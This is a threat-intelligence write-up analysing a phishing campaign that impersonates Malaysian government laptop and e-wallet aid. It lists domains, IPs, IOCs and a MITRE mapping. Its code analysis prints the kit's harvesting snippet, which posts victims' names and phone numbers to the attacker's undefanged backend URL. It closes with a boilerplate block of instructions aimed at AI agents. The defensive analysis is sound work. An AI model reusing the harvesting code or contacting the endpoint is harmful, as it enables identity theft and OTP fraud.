# Phishing Campaign Analysis: “Laptop Percuma / Bantuan E-Wallet” Scam > Date: 14 March 2026 > > Target URL: `http://bantuan-malay[.]biz[.]id/66/` > > Threat Type: Phishing / Social Engineering / Credential Harvesting > > Target Theme: Malaysian Government Assistance (E-Wallet / Laptop Program) ## Executive Summary A phishing campaign targeting Malaysian users was identified. The campaign spreads via a social engineering message claiming that registration for a free laptop program for students (“Laptop Percuma”) has opened. However, victims who click the link are redirected to a fake Bantuan E-Wallet eligibility verification page that attempts to harvest personal information including the victim’s name and phone number. Infrastructure analysis revealed that the phishing domain is recently registered and is protected by Cloudflare reverse proxy services, while victim data is transmitted to an external backend server hosted on `xwasq[.]com`. Additional threat intelligence indicates the phishing template is reused across multiple domains impersonating Malaysian government assistance programs, suggesting a broader phishing campaign. ## Discovery The phishing activity was discovered through a suspicious message distributed on the messaging platform Telegram. The message contained a phishing link and promoted a program described as: "Pendaftaran program Laptop percuma untuk pelajar dibuka hari ini."

Figure 1: Telegram message containing Phishing Link

The wording indicates that the campaign specifically targets students, particularly those who may not be able to afford a laptop. By leveraging the promise of free devices, the threat actor attempts to exploit financial vulnerability and increase the likelihood that recipients will click the provided link. After accessing the link, victims are redirected to a phishing website presenting itself as a government assistance eligibility verification portal. ## Infrastructure and Threat Intelligence ### Domain Infrastructure

Attribute	Value
Domain	`bantuan-malay[.]biz[.]id`
Registrar	PT Dewabisnis Digital Indonesia
Creation Date	2026-03-01
Expiry Date	2027-03-01
Domain Age	~11 days

Recently registered domains are a common indicator of phishing infrastructure. ### DNS and Hosting

Attribute	Value
A	`104.21.78.24` , `172.67.215.26`
AAAA	`2606:4700:3032::6815:4e18` , `2606:4700:3037::ac43:d71a`
Name Servers	`titan.ns.cloudflare.com` , `heidi.ns.cloudflare.com`
Start of Authority	`heidi.ns.cloudflare.com`

These IP addresses belong to Cloudflare Inc. (AS13335). Cloudflare is acting as a **reverse proxy**, hiding the real hosting server. ### Backend Infrastructure The phishing page sends collected data to: `https://xwasq[.]com/terkini6/send_otp` #### Backend Domain Details

Attribute	Value
Domain	`xwasq[.]com`
Registrar	Web Commerce Communications Ltd (WebNIC)
IP Address	`103.163.138.21`
Location	Indonesia
Registrant Name	Budak Lhepak
Registrant Location	Malang, Indonesia
Registrant Email	lhepakbudak@gmail[.]com

### Phishing Infrastructure To identify related phishing infrastructure, a search was performed using URLScan based on the page hash, which revealed multiple domains hosting similar phishing templates.

Figure 2: URLScan search results revealing multiple related phishing domains impersonating Malaysian assistance programs

{% hint style="info" %} This suggests the threat actor may be operating a phishing kit deployed across multiple domains targeting Malaysian users. {% endhint %} ## Technical Analysis ### Phishing Page

Figure 3: Main Landing Page

Figure 4: Name & phone number input of Landing Page

Figure 5: Verification of Landing Page

{% hint style="info" %} The page visually mimics government assistance portals to increase credibility. {% endhint %} ### Attack Flow Diagram ``` ┌───────────────────────────┐ │ Threat Actor │ │ Creates phishing domain │ │ & phishing kit │ └─────────────┬─────────────┘ │ │ Distributes phishing message │ "Laptop Percuma untuk pelajar" ▼ ┌───────────────────────────┐ │ Victim │ │ Receives phishing link │ │ via social media / chat │ └─────────────┬─────────────┘ │ │ Clicks malicious link ▼ ┌───────────────────────────┐ │ Phishing Landing Page │ │ bantuan-malay[.]biz[.]id │ │ Fake Bantuan E-Wallet │ │ verification portal │ └─────────────┬─────────────┘ │ │ Victim submits information │ (Full name + phone number) ▼ ┌───────────────────────────┐ │ Backend Data Server │ │ xwasq[.]com │ │ Receives victim data │ └─────────────┬─────────────┘ │ │ Redirect victim ▼ ┌───────────────────────────┐ │ OTP Verification │ │ code.php │ │ Attempts to capture OTP │ └─────────────┬─────────────┘ │ ▼ ┌───────────────────────────┐ │ Threat Actor │ │ Uses collected data for │ │ fraud / identity theft │ └───────────────────────────┘ ``` ### Code Analysis Inspection of the phishing page source code reveals the mechanism used to collect victim information and transmit it to the attacker-controlled backend infrastructure. The form collects the following information from the victim: | Field | Description | | -------- | ---------------------------------------------------- | | fullName | Victim’s full name (claimed to match MyKad identity) | | phone | Victim’s Telegram phone number | The JavaScript code then sends the captured data to a remote server using an **AJAX POST request**. Code observed in the page source: ``` $.ajax({ url: endpointUrl + "/send_otp", type: "POST", contentType: "application/json", data: JSON.stringify({ phone: "+60" + phone, fullName: $("#fullName").val() }), }) ``` The destination endpoint is defined in the JavaScript configuration: ``` var phpSettings = { endpointUrl: 'https://xwasq.com/terkini6' }; ``` This indicates that victim data is transmitted to the following backend API: ``` https://xwasq[.]com/terkini6/send_otp ``` After successful submission, the victim is redirected to another page: ``` code.php ``` This behavior suggests the phishing kit attempts to simulate a **verification process**, likely intended to capture **OTP codes or further authentication information** from victims. ## MITRE ATT\&CK Mapping | Technique | ID | Description | | --------------------- | ----- | ---------------------------------- | | Phishing | T1566 | Social engineering lure | | Masquerading | T1036 | Impersonation of government aid | | Credential Harvesting | T1056 | Collection of personal information | | Proxy Infrastructure | T1090 | Use of Cloudflare as reverse proxy | | Exfiltration Over Web | T1041 | Data sent to attacker server | ## Indicators of Compromise (IOCs) ### Network IOCs | Indicator Type | Value | Description | | -------------- | ----------------------------------------- | ------------------------------- | | URL | | Main phishing landing page | | Domain | bantuan-malay\[.]biz\[.]id | Phishing domain | | Domain | xwasq\[.]com | Backend data collection server | | IP Address | 104.21.78.24 | Cloudflare proxy IP | | IP Address | 172.67.215.26 | Cloudflare proxy IP | | IP Address | 103.163.138.21 | Backend phishing infrastructure | ### Content IOCs

Type	Value
Page title	BANTUAN E-WALLET - SEMAKAN STATUS
Metadata	SEMAKAN STATUS KELAYAKAN BANTUAN E-WALLET
UI text	SILA ISI MAKLUMAT DENGAN BETUL
API endpoint	`send_otp`
Redirect page	`code.php`

### Behavioral IOCs | Behavior | Description | | --------------------------- | -------------------------- | | POST to `/send_otp` | Victim phone harvesting | | Redirect to `code.php` | OTP harvesting attempt | | Cloudflare proxy usage | Infrastructure concealment | | Mismatch lure vs page theme | Phishing kit reuse | ## Recommendations Users and organizations should take the following actions when encountering phishing campaigns similar to this investigation. ### Report the Phishing Domain If you encounter the phishing URL identified in this report, consider reporting it to the relevant service providers to help prevent further victimization. Possible reporting channels include: 1. [Google Safe Browsing](https://safebrowsing.google.com/safebrowsing/report_phish/) 2. [MyCERT (Cyber999)](https://www.mycert.org.my/portal/full?id=9eb77829-7dd4-4180-814f-de3a539b7a01)

Figure 6: Phishing domain successfully reported to Google Safe Browsing

### User Safety Recommendations Users should: * Avoid clicking unsolicited links promising financial assistance * Verify government aid programs through official websites * Avoid submitting personal information on unknown websites Organizations should: * Block the phishing domain at DNS or firewall level * Monitor network traffic for connections to identified IOCs * Educate users about social engineering tactics ## Conclusion This investigation uncovered an active phishing campaign targeting Malaysian users by impersonating government assistance programs. Key findings include: * Use of recently registered phishing domains * Infrastructure hidden behind Cloudflare * External data exfiltration server * Reuse of phishing templates across multiple campaigns The mismatch between **“Laptop Percuma” messaging and an “E-Wallet assistance” landing page** strongly suggests the attacker is **reusing a phishing kit across different scam campaigns**. Users should avoid interacting with unsolicited aid program links and verify any government assistance announcements through official sources. --- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://myos-esc.gitbook.io/myos-esc./blogs/phishing-campaign-analysis-laptop-percuma-bantuan-e-wallet-scam.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.